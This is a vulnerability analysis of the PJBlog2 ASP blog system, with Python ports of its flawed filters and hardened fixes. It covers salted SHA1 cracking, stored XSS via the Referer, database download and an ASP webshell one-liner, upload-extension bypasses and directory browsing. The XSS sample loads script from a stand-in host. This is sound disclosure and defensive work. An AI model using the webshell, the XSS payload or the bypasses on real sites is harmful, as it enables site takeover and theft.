PJBlog Security Analysis

Source: Internet
Author: User

PJBlog2 is a free ASP + Access personal blog system developed by puterjam. I wanted a blog to play with these days; after comparing several, I picked PJBlog2 for its features and relatively nice interface. After trying it out I found it quite good, but I also noticed a few small security problems, so I am posting my modest findings here. The version analyzed is PJBlog2 v2.4.1211, released 11 December 2005.

I. Password hashing algorithm
PJBlog2 does not hash user passwords with the common MD5 algorithm but with SHA1. Like MD5, SHA1 is a one-way hash function; it produces a 160-bit digest for input of any length.
When PJBlog2 creates a new user it generates a random 6-character salt, appends it to the user's plaintext password and hashes the result to obtain the stored password, i.e. Password = SHA1(User_pwd & Salt). The benefit is that even if two users choose the same password, the stored hashes are completely different, and precomputed tables for plain SHA1 do not apply. This slightly "unconventional" scheme makes cracking the password a bit harder.
That said, harder does not mean uncrackable. There is no ready-made tool on the Internet, so one has to write one by hand. Since .NET provides a SHA1 class I originally wrote it in VB.NET, but I could not solve a resource-consumption problem and had to switch to C. I searched a long time for a C implementation of SHA1 and finally found one on a foreigner's site; those interested can look at his SHA1 class: Http://www.codeproject.com/cpp/csha1.asp
The program can be downloaded here (Http://www.0x54.org/lake2/program/PJBlogCracker.exe). It is command-line, the functionality is fairly weak, it is single-threaded and very slow, and there may be bugs; I will improve it a little once the many problems are sorted out.
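As an added illustration (not code from PJBlog2 or from the article's author), the following Python reproduces the Password = SHA1(User_pwd & Salt) scheme and the kind of offline dictionary attack the cracker described above performs. The salt alphabet, the lower-case hex encoding of the digest and the wordlist are assumptions; the page only states the salt length and the hash construction. It also shows why the salt defeats only precomputation: because the salt is stored next to the hash, an attacker who has the database simply includes it in every guess.

```python
import hashlib
import secrets
import string
from typing import Iterable, Iterator, Optional

# Assumption: alphanumeric salt characters; the page only says the salt is 6 characters long.
SALT_ALPHABET = string.ascii_letters + string.digits


def make_salt(length: int = 6) -> str:
    """Random salt generated when a user is created."""
    return "".join(secrets.choice(SALT_ALPHABET) for _ in range(length))


def pjblog_hash(password: str, salt: str) -> str:
    """Password = SHA1(User_pwd & Salt): the salt is appended to the plaintext
    without any separator. Lower-case hex output is an assumption."""
    return hashlib.sha1((password + salt).encode("utf-8")).hexdigest()


def verify(password: str, salt: str, stored_hash: str) -> bool:
    """Login check against the stored (hash, salt) pair."""
    return pjblog_hash(password, salt) == stored_hash.lower()


def mutate(words: Iterable[str]) -> Iterator[str]:
    """Cheap wordlist rules of the kind a cracker applies to each base word."""
    for w in words:
        yield w
        yield w.capitalize()
        yield w + "1"
        yield w + "123"
        yield w.capitalize() + "123"


def crack(stored_hash: str, salt: str, words: Iterable[str]) -> Optional[str]:
    """Offline attack: the salt sits in the same table row as the hash, so every
    candidate is simply hashed with that salt and compared."""
    target = stored_hash.lower()
    for guess in mutate(words):
        if pjblog_hash(guess, salt) == target:
            return guess
    return None


# Constructed sample data: one user row as an attacker sees it after downloading the database.
SAMPLE_SALT = "Q1w2E3"
SAMPLE_HASH = pjblog_hash("letmein", SAMPLE_SALT)
SAMPLE_WORDLIST = ["admin", "password", "letmein", "123456"]


if __name__ == "__main__":
    # Same password, two salts: two different stored values ...
    print(pjblog_hash("letmein", "aaaaaa"))
    print(pjblog_hash("letmein", "bbbbbb"))
    # ... but the salt does not slow down a targeted dictionary attack at all.
    print("recovered:", crack(SAMPLE_HASH, SAMPLE_SALT, SAMPLE_WORDLIST))
```

Because the salt is concatenated without a separator, pjblog_hash("ab", "c") equals pjblog_hash("a", "bc"); that does not help an attacker here, but it is one reason salted constructions normally use an HMAC or a purpose-built slow password hash (bcrypt, scrypt, Argon2). The slow hash is also the real answer to the cracker: the defender should make each guess expensive rather than rely on a 6-character salt.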

II. Login authentication
PJBlog2 authenticates with a cookie plus the client IP. When a user logs in successfully, the system generates a random HashKey, writes it to a cookie and records it in the database; the user is then identified by the HashKey, username and IP held in the cookie. The cookie itself is easy to obtain (cross-site scripting, the downloaded database, and so on), but the IP is hard to match, so cookie spoofing seems unlikely to succeed. I will skip this one.

III. Several places where filtering is not strict
The first is the visitor statistics: the Referer is not filtered strictly. See:

Guest_Refer=Trim(Request.ServerVariables("HTTP_REFERER"))
Conn.Execute("INSERT INTO blog_Counter (coun_ip,coun_os,coun_browser,coun_referer) VALUES ('"&Guest_IP&"','"&Guest_Browser(1)&"','"&Guest_Browser(0)&"','"&CheckStr(Guest_Refer)&"')")


The Referer is only passed through CheckStr before it is stored. Here is the CheckStr code:

'*************************************
' Filter special characters
'*************************************
Function CheckStr(ByVal ChkStr)
	Dim Str:Str=ChkStr
	Str=Trim(Str)
	If IsNull(Str) Then
		CheckStr = ""
		Exit Function
	End If
	' Ampersands and quotes become HTML entities; "<" and ">" are left alone
	str = Replace(str, "&", "&amp;")
	str = Replace(str, "'", "&#39;")
	str = Replace(str, """", "&quot;")
	Dim re
	Set re=new RegExp
	re.IgnoreCase=True
	re.Global=True
	' One letter of each SQL keyword is replaced by its HTML entity (&#104; is "h")
	re.Pattern="(w)(here)"
	str = re.Replace(str,"$1&#104;ere")
	re.Pattern="(s)(elect)"
	str = re.Replace(str,"$1&#101;lect")
	re.Pattern="(i)(nsert)"
	str = re.Replace(str,"$1&#110;sert")
	re.Pattern="(c)(reate)"
	str = re.Replace(str,"$1&#114;eate")
	re.Pattern="(d)(rop)"
	str = re.Replace(str,"$1&#114;op")
	re.Pattern="(a)(lter)"
	str = re.Replace(str,"$1&#108;ter")
	re.Pattern="(d)(elete)"
	str = re.Replace(str,"$1&#101;lete")
	re.Pattern="(u)(pdate)"
	str = re.Replace(str,"$1&#112;date")
	re.Pattern="(\s)(or)"
	str = re.Replace(str,"$1&#111;r")
	Set re=Nothing
	CheckStr=str
End Function


Single quotes, double quotes, ampersands and the SQL keywords are handled, but the most important characters, "<" and ">", are not filtered, so a cross-site scripting attack goes through. Note that the statistics page displays only the first 40 characters of the Referer, so the payload must be constructed to fit.
The second is the visitor comment form: the user name also goes through CheckStr, and the database limits it to 24 characters. Building a cross-site script in 24 characters is harder, but the field has other uses, detailed later in this article.
Some bloggers disable visitor comments and require registration; after registering, the name textbox is pre-filled with the registered name and set read-only. That does not matter: the form data can be submitted from outside the page.
Another is the blog's message board plug-in, where the user name is again poorly filtered. This one is harder to use because the field allows only 20 characters.
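To make the gap concrete, here is an added Python port of CheckStr (not PJBlog2's own code; the port mirrors the VBScript above, including VBScript's Trim, which strips only spaces) followed by the statistics page's handling of the Referer. The 40-character truncation is the one the text mentions; the sample Referer header and the hostname in it are constructed for the example. It shows that quotes and SQL keywords are mangled while a <script> tag passes through untouched, and what output encoding with html.escape does to the same value.

```python
import html
import re

# One letter of each keyword is replaced by its HTML entity, exactly as the VBScript does.
KEYWORD_RULES = [
    (r"(w)(here)", r"\1&#104;ere"),
    (r"(s)(elect)", r"\1&#101;lect"),
    (r"(i)(nsert)", r"\1&#110;sert"),
    (r"(c)(reate)", r"\1&#114;eate"),
    (r"(d)(rop)", r"\1&#114;op"),
    (r"(a)(lter)", r"\1&#108;ter"),
    (r"(d)(elete)", r"\1&#101;lete"),
    (r"(u)(pdate)", r"\1&#112;date"),
    (r"(\s)(or)", r"\1&#111;r"),
]


def checkstr(chkstr):
    """Port of PJBlog2's CheckStr. Note what it does NOT touch: '<' and '>'."""
    if chkstr is None:
        return ""
    s = chkstr.strip(" ")                      # VBScript Trim removes spaces only
    s = s.replace("&", "&amp;")                # done first, so the entities added below stay intact
    s = s.replace("'", "&#39;")
    s = s.replace('"', "&quot;")
    for pattern, repl in KEYWORD_RULES:
        s = re.sub(pattern, repl, s, flags=re.IGNORECASE)
    return s


def stored_referer(referer_header):
    """What the counter INSERT stores: Trim(Request.ServerVariables("HTTP_REFERER")) through CheckStr."""
    return checkstr(referer_header.strip(" "))


def displayed_referer(stored):
    """The statistics page shows only the first 40 characters of the stored value, as-is."""
    return stored[:40]


def render_referer_fixed(raw_referer):
    """Hardened output: keep the raw value (a parameterised INSERT makes CheckStr
    unnecessary for SQL) and HTML-encode at display time, so '<' and '>' cannot form a tag."""
    return html.escape(raw_referer.strip(" ")[:40], quote=True)


# Constructed sample: a Referer header chosen to survive CheckStr and fit in 40 characters.
SAMPLE_REFERER = "<script src=//a.example/x></script>"


if __name__ == "__main__":
    print(displayed_referer(stored_referer(SAMPLE_REFERER)))   # tag survives intact
    print(render_referer_fixed(SAMPLE_REFERER))                  # rendered as text
    print(checkstr("x' or 1=1"))                                 # quote and OR mangled
```

The two functions at the end show the design difference: CheckStr tries to make input safe for every later use at once and misses the browser, while encoding at the output boundary (and parameterising the query at the database boundary) handles each context with the right rule. Stacking html.escape on top of CheckStr's output would double-encode its entities, which is why the hardened version starts from the raw value.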

IV. Database problems
PJBlog2's default database name is pblog.asp. Although the database contains a table named blog_NotDownload that is meant to prevent downloading, requesting the database file still lets you download it.
Since it can be downloaded, ASP code can of course be inserted into it and executed. In some places (for example visitor comments) the inserted ASP code gets torn apart; I do not know why, which is frustrating.
The name field of a visitor comment can hold ASP code. As said above, the filtering there is not strict, and since the stored ASP is not rendered, all a visitor sees is a nameless comment. This takes some construction: the limit is 24 characters and the quote characters are filtered. After some thought the shortest payload I found is exactly 24 characters: <%eval request(Chr(9))%> (Chr(9), a tab, stands in for the quoted parameter name that the filter would mangle).
The message board content can also hold ASP code, but the administrator will see it when reading the messages.
Of course most webmasters should have changed the database name, but in testing I still found a few who had not...

V. File upload
For security reasons PJBlog2 restricts the upload file types, blocking ASP, ASA, ASPX, CER, CDX and HTR. In practice many virtual hosts run not only ASP but also ASPX, PHP and Perl, and SHTML can be uploaded too, so the restriction should cover every file type the server will execute.
There is another problem with uploads. Look at the code in attachment.asp:

Dim F_File,F_Type
Set F_File=FileUp.File("File")
F_Name=RandomStr(1)&Year(Now)&Month(Now)&Day(Now)&Hour(Now)&Minute(Now)&"."&F_File.FileExt
F_Type=FixName(F_File.FileExt)
If F_File.FileSize > Int(Up_FileSize) Then
	Response.Write("<div style=""padding:6px""><a href='attachment.asp'>File size exceeded, please go back and upload again</a></div>")
ElseIf IsValidFile(UCase(F_Type)) = False Then
	Response.Write("<div style=""padding:6px""><a href='attachment.asp'>Illegal file format, please go back and upload again</a></div>")
Else
	F_File.SaveAs Server.MapPath("attachments/"&D_Name&"/"&F_Name)
	Response.Write "<script>addUploadItem('"&F_Type&"','attachments/"&D_Name&"/"&F_Name&"',"&Request.QueryString("msave")&")</script>"
	Response.Write("<div style=""padding:6px""><a href='attachment.asp'>File uploaded successfully, please go back to continue uploading</a></div>")
End If


The file is saved with the suffix F_File.FileExt, but the suffix that is checked is the one processed by the FixName() function. Here is the FixName definition, in function.asp:

'*************************************
' Filter file name
'*************************************
Function FixName(UpFileExt)
	If IsEmpty(UpFileExt) Then Exit Function
	FixName = UCase(UpFileExt)
	FixName = Replace(FixName, Chr(0), "")
	FixName = Replace(FixName, ".", "")
	' "ASP" is removed before "ASPX", so the "ASPX" line below never matches anything
	FixName = Replace(FixName, "ASP", "")
	FixName = Replace(FixName, "ASA", "")
	FixName = Replace(FixName, "ASPX", "")
	FixName = Replace(FixName, "CER", "")
	FixName = Replace(FixName, "CDX", "")
	FixName = Replace(FixName, "HTR", "")
End Function


It strips the dangerous suffixes. If my file suffix is asp(0x00)gif, the check strips Chr(0) and ASP, the suffix becomes gif and passes, but at save time it is still asp(0x00)gif. In theory that should work, but I tried for half a day without success, which is frustrating; if anyone knows why, please tell me.
But this can be used to upload a file in ASPX format: when an .aspx file is uploaded, FixName strips "ASP" and the checked suffix becomes "X". As long as "x" is among the permitted upload formats, the .aspx file passes the check and is saved with its real .aspx suffix.
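The following Python is an added example (not PJBlog2's code) that ports FixName and the check/save sequence of attachment.asp so the two behaviours described above can be observed directly: "aspx" surviving as "X", and "asp" + NUL + "gif" surviving as "GIF", while the saved file name still carries the raw suffix. IsValidFile's allowed list, the generated file name and the hardened allow-list are assumptions for the example.

```python
import re
from typing import Optional

# The suffixes FixName deletes, in the order the VBScript deletes them.
FIXNAME_BLOCKLIST = ["ASP", "ASA", "ASPX", "CER", "CDX", "HTR"]


def fixname(upfileext: str) -> str:
    """Port of PJBlog2's FixName: upper-case, drop NUL and '.', then delete each
    blocked substring in turn. Deleting "ASP" first turns "ASPX" into "X"."""
    if not upfileext:
        return ""
    name = upfileext.upper().replace("\x00", "").replace(".", "")
    for bad in FIXNAME_BLOCKLIST:
        name = name.replace(bad, "")
    return name


def is_valid_file(ext_upper: str, allowed: set) -> bool:
    """Assumed behaviour of IsValidFile: the suffix must be in the admin's upload list."""
    return ext_upper in allowed


def original_upload(fileext: str, allowed: set) -> Optional[str]:
    """Mirrors attachment.asp: the check runs on FixName(ext), but the saved name
    is built from the raw ext. Returns the saved path, or None if rejected."""
    f_type = fixname(fileext)
    if not is_valid_file(f_type.upper(), allowed):
        return None
    # Constructed stand-in for RandomStr(1) & date/time; the real name is random.
    return "attachments/month_0512/a200512111200." + fileext


# Hypothetical allow-list for the hardened version.
SAFE_EXTS = {"GIF", "JPG", "JPEG", "PNG", "ZIP", "RAR"}


def hardened_upload(filename: str) -> Optional[str]:
    """Allow-list instead of block-list, validated once, and the validated
    suffix (not the client's string) is what the file is saved under."""
    if "\x00" in filename:
        return None
    m = re.fullmatch(r"[^/\\]+\.([A-Za-z0-9]{1,5})", filename)
    if not m:
        return None
    ext = m.group(1).upper()
    if ext not in SAFE_EXTS:
        return None
    return "attachments/month_0512/a200512111200." + ext.lower()


if __name__ == "__main__":
    allowed = {"GIF", "JPG", "X"}            # "X" permitted, as the text describes
    print(fixname("aspx"), fixname("asp\x00gif"), fixname("php"))
    print(original_upload("aspx", allowed))
    print(repr(original_upload("asp\x00gif", allowed)))
    print(hardened_upload("shell.aspx"), hardened_upload("photo.GIF"))
```

Two things make the original fragile: the decision is taken on a transformed copy of the suffix while the file is written with the untransformed one, and a block-list built from substring deletion interacts with itself (ASP inside ASPX). The hardened version removes both problems by deriving one validated suffix and using it for both the check and the save.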

VI. Attachment management problems
The admin area has an attachment management function whose parameters look like http://localhost/blog/ConContent.asp?fmenu=sqlfile&smenu=attachments&attpath=attachments/month_0512; by specifying AttPath you can browse directories of the web site.
However, the system rejects requests submitted from outside the site, so the URL cannot simply be edited in the browser; a detour is needed. Use the "add link" function, enter the constructed URL as the link, save it, and then click the link to view it, which bypasses the off-site restriction. Note that the first character of the constructed AttPath cannot be "." or "/", because the program checks for that. We can then jump to the blog root directory: http://localhost/blog/ConContent.asp?Fmenu=SQLFile&Smenu=Attachments&AttPath=attachments/.
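As an added example (not code from PJBlog2 or the article), the Python below models the AttPath check the text describes, a first-character test for "." and "/", next to a containment check on the normalised path. The site root, the attachments directory and the sample paths are constructed; the page itself only shows attachments/month_0512 and the restriction on the first character.

```python
import posixpath
from typing import Optional

# Constructed site layout; the page only shows the relative value attachments/month_0512.
WEB_ROOT = "/inetpub/blog"
ATTACH_ROOT = posixpath.join(WEB_ROOT, "attachments")


def passes_original_check(attpath: str) -> bool:
    """The check the text describes: only the first character is inspected."""
    return bool(attpath) and attpath[0] not in "./"


def resolve_naive(attpath: str) -> Optional[str]:
    """Directory the original logic would list: the parameter is appended to the
    site root after the first-character check, and '..' segments are honoured."""
    if not passes_original_check(attpath):
        return None
    return posixpath.normpath(posixpath.join(WEB_ROOT, attpath))


def resolve_contained(attpath: str) -> Optional[str]:
    """Hardened: normalise first, then refuse anything that leaves ATTACH_ROOT.
    Backslashes are rejected outright because IIS treats them as separators too."""
    if not attpath or "\x00" in attpath or "\\" in attpath:
        return None
    target = posixpath.normpath(posixpath.join(WEB_ROOT, attpath))
    if target != ATTACH_ROOT and not target.startswith(ATTACH_ROOT + "/"):
        return None
    return target


if __name__ == "__main__":
    for p in ("attachments/month_0512", "attachments/../", "attachments/../../", "../", "/etc"):
        print(f"{p!r:28} first-char check: {passes_original_check(p)!s:5} "
              f"naive: {resolve_naive(p)!s:24} contained: {resolve_contained(p)}")
```

A value such as attachments/../ starts with a letter, so it satisfies the first-character test and still walks out of the attachments directory once the path is resolved; checking the resolved path against the directory it must stay inside is the check that actually enforces the intent.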


Finally, I still hope everyone supports PJBlog2; it really is very easy to use. I hope the author keeps making this blog system better, for the benefit of many netizens.
PS: The author is really diligent; the patch is already out.
